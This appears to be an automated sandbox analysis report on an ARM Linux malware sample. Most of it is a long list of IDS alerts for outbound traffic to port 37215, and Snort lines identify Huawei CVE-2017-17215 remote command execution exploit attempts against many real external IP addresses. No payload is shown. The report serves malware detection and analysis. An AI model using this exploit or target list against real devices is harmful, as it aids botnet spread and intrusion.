          SID:2835222
          Source Port:48950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549804
          SID:2835222
          Source Port:56266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737873
          SID:2829579
          Source Port:33518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731498
          SID:2829579
          Source Port:51310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599461
          SID:2829579
          Source Port:44358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180085
          SID:2835222
          Source Port:46468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158405
          SID:2835222
          Source Port:48334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160733
          SID:2829579
          Source Port:60628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791958
          SID:2835222
          Source Port:47576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352075
          SID:2835222
          Source Port:41522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896302
          SID:2835222
          Source Port:39942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668586
          SID:2829579
          Source Port:38842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599511
          SID:2829579
          Source Port:42934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262106
          SID:2829579
          Source Port:35630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462899
          SID:2835222
          Source Port:52324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819160
          SID:2829579
          Source Port:53986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449029
          SID:2835222
          Source Port:56634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599298
          SID:2835222
          Source Port:50594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352714
          SID:2829579
          Source Port:55352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894957
          SID:2829579
          Source Port:34778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354639
          SID:2835222
          Source Port:42342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269163
          SID:2829579
          Source Port:50978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108118
          SID:2835222
          Source Port:35218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706554
          SID:2835222
          Source Port:53262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108143
          SID:2829579
          Source Port:33530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136624
          SID:2829579
          Source Port:33184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730033
          SID:2835222
          Source Port:51180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787096
          SID:2835222
          Source Port:44318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014559
          SID:2835222
          Source Port:51302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155341
          SID:2835222
          Source Port:44768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742116
          SID:2835222
          Source Port:56210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895750
          SID:2829579
          Source Port:34414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554842
          SID:2835222
          Source Port:45576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601138
          SID:2829579
          Source Port:40000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810720
          SID:2829579
          Source Port:52156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184122
          SID:2829579
          Source Port:45970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546604
          SID:2829579
          Source Port:36146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395428
          SID:2829579
          Source Port:52210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747659
          SID:2835222
          Source Port:48700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403206
          SID:2829579
          Source Port:44862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238005
          SID:2829579
          Source Port:44352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746107
          SID:2835222
          Source Port:47324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070869
          SID:2835222
          Source Port:48046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154132
          SID:2829579
          Source Port:48662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.913668
          SID:2829579
          Source Port:47248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177444
          SID:2835222
          Source Port:37260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810690
          SID:2835222
          Source Port:53662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911551
          SID:2829579
          Source Port:44120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731116
          SID:2829579
          Source Port:55096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038926
          SID:2829579
          Source Port:34880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270009
          SID:2835222
          Source Port:60974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.883955
          SID:2829579
          Source Port:53908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549374
          SID:2829579
          Source Port:49044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259217
          SID:2829579
          Source Port:54110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059777
          SID:2835222
          Source Port:37014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405099
          SID:2835222
          Source Port:42682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667620
          SID:2829579
          Source Port:57978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901832
          SID:2829579
          Source Port:60282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132016
          SID:2835222
          Source Port:55720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517140
          SID:2829579
          Source Port:42904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.159011
          SID:2829579
          Source Port:41032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354725
          SID:2835222
          Source Port:42498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897518
          SID:2835222
          Source Port:48578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745501
          SID:2829579
          Source Port:38812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671729
          SID:2829579
          Source Port:49344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257695
          SID:2829579
          Source Port:36830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306348
          SID:2835222
          Source Port:57666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410084
          SID:2835222
          Source Port:57562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601014
          SID:2829579
          Source Port:48158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242957
          SID:2835222
          Source Port:48694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408547
          SID:2835222
          Source Port:44888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018867
          SID:2835222
          Source Port:55676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810473
          SID:2829579
          Source Port:51512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266514
          SID:2829579
          Source Port:38824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463849
          SID:2835222
          Source Port:60382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410036
          SID:2835222
          Source Port:60358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784388
          SID:2829579
          Source Port:45190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513045
          SID:2835222
          Source Port:37204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169439
          SID:2829579
          Source Port:59634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449154
          SID:2835222
          Source Port:47948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894777
          SID:2829579
          Source Port:38460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471891
          SID:2835222
          Source Port:57326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744297
          SID:2829579
          Source Port:35664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.796285
          SID:2835222
          Source Port:60226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133117
          SID:2835222
          Source Port:45372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512813
          SID:2835222
          Source Port:43474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461033
          SID:2835222
          Source Port:59738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127191
          SID:2835222
          Source Port:38128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440962
          SID:2829579
          Source Port:37034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511053
          SID:2835222
          Source Port:54564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133147
          SID:2835222
          Source Port:46990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599233
          SID:2829579
          Source Port:54394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732160
          SID:2829579
          Source Port:41050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463110
          SID:2829579
          Source Port:37848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808015
          SID:2835222
          Source Port:48768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107541
          SID:2829579
          Source Port:49566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671338
          SID:2835222
          Source Port:55932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707649
          SID:2829579
          Source Port:45170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897250
          SID:2829579
          Source Port:38774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512716
          SID:2835222
          Source Port:53366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184588
          SID:2829579
          Source Port:46788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739534
          SID:2835222
          Source Port:43016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355908
          SID:2829579
          Source Port:57788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887597
          SID:2835222
          Source Port:33872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173380
          SID:2835222
          Source Port:54682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.598770
          SID:2835222
          Source Port:39074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466653
          SID:2835222
          Source Port:43144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306391
          SID:2829579
          Source Port:48802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604713
          SID:2835222
          Source Port:50990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108106
          SID:2829579
          Source Port:45366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.083081
          SID:2835222
          Source Port:52422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730121
          SID:2829579
          Source Port:47380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353033
          SID:2829579
          Source Port:55650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161600
          SID:2829579
          Source Port:36992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741902
          SID:2835222
          Source Port:40106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.079786
          SID:2829579
          Source Port:46330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546032
          SID:2829579
          Source Port:59554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266183
          SID:2829579
          Source Port:47036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743341
          SID:2829579
          Source Port:37268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.799380
          SID:2829579
          Source Port:36198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730764
          SID:2829579
          Source Port:45446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854318
          SID:2835222
          Source Port:58592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.862447
          SID:2829579
          Source Port:53086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857874
          SID:2829579
          Source Port:33300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041892
          SID:2835222
          Source Port:42264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551968
          SID:2829579
          Source Port:37634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172960
          SID:2835222
          Source Port:37478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781524
          SID:2829579
          Source Port:37974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741065
          SID:2829579
          Source Port:57994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.606345
          SID:2835222
          Source Port:57946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467051
          SID:2829579
          Source Port:52452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178562
          SID:2829579
          Source Port:40746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114193
          SID:2835222
          Source Port:44188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891410
          SID:2829579
          Source Port:49132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351351
          SID:2835222
          Source Port:45950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891310
          SID:2829579
          Source Port:49366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749204
          SID:2829579
          Source Port:36210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352288
          SID:2835222
          Source Port:51042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743909
          SID:2829579
          Source Port:36202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159163
          SID:2835222
          Source Port:35546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808930
          SID:2829579
          Source Port:37046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511273
          SID:2829579
          Source Port:44762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511624
          SID:2829579
          Source Port:47704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110798
          SID:2829579
          Source Port:48804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549427
          SID:2835222
          Source Port:39750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601410
          SID:2829579
          Source Port:57370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126023
          SID:2835222
          Source Port:37330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356220
          SID:2835222
          Source Port:43990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810252
          SID:2835222
          Source Port:38262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260632
          SID:2835222
          Source Port:36420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.844161
          SID:2829579
          Source Port:54446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813262
          SID:2829579
          Source Port:38856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112668
          SID:2829579
          Source Port:56868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861796
          SID:2829579
          Source Port:38546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781929
          SID:2835222
          Source Port:40152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732643
          SID:2829579
          Source Port:48398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732475
          SID:2829579
          Source Port:40856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463231
          SID:2829579
          Source Port:36170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554220
          SID:2829579
          Source Port:58486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805205
          SID:2835222
          Source Port:48376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262517
          SID:2829579
          Source Port:57868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547827
          SID:2835222
          Source Port:43410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783242
          SID:2835222
          Source Port:43822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509076
          SID:2829579
          Source Port:58604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264286
          SID:2835222
          Source Port:47392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015428
          SID:2829579
          Source Port:51598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912402
          SID:2829579
          Source Port:44052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857158
          SID:2829579
          Source Port:56856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038903
          SID:2835222
          Source Port:49188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099170
          SID:2829579
          Source Port:57176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266630
          SID:2829579
          Source Port:47514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: arm4.elfReversingLabs: Detection: 23%

          Networking

          barindex
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:36490 -> 41.197.21.187:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:36490 -> 41.197.21.187:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:38634 -> 41.220.10.229:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:38634 -> 41.220.10.229:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58802 -> 41.13.27.69:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58802 -> 41.13.27.69:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:35594 -> 41.26.61.207:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:35594 -> 41.26.61.207:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:55964 -> 41.9.160.229:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:55964 -> 41.9.160.229:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:42700 -> 41.233.158.37:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:42700 -> 41.233.158.37:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:39832 -> 41.171.185.81:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:39832 -> 41.171.185.81:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:53140 -> 41.147.245.60:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:53140 -> 41.147.245.60:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:57098 -> 41.157.30.71:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:57098 -> 41.157.30.71:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:58136 -> 41.17.40.118:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:58136 -> 41.17.40.118:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:52272 -> 41.217.17.198:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.15:52272 -> 41.217.17.198:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.15:41018 -> 41.30.180.63:37215
